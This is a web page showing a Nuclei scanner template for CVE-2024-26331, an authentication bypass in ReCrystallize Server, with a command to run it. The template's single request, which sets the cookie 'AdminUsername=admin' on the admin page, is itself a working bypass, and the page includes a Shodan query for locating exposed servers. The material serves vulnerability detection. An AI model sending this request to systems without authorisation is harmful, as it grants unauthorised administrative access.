Skip to content

ReCrystallize Server - Authentication Bypass

ID: CVE-2024-26331

Severity: high

Author: Carson Chan

Tags: cve,recrystallize,auth-bypass,cve2024

This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the ‘AdminUsername’ cookie. This gives the attacker administrative access to the application’s functionality, even when the default password has been changed.

id: CVE-2024-26331
info:
name: ReCrystallize Server - Authentication Bypass
author: Carson Chan
severity: high
description: |
This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
reference:
- https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
- https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
- https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
- https://github.com/Ostorlab/KEV
classification:
epss-score: 0.00053
epss-percentile: 0.21091
metadata:
verified: true
max-request: 1
shodan-query: title:"ReCrystallize"
tags: cve,recrystallize,auth-bypass,cve2024
http:
- method: GET
path:
- "{{BaseURL}}/Admin/Admin.aspx"
headers:
Cookie: "AdminUsername=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ReCrystallize Server Administration"
- "License Status:"
- "System Info</a>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f0f0fa48ec4b5dfd5d125c14ea6509be76a4a93c49146c1cdf9e1cf402a42348022100cbd2033bf4b15f11a62b6c01f1695d67fccdb98cb41dd479566a77d2835f3191:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-26331.yaml"

View on Github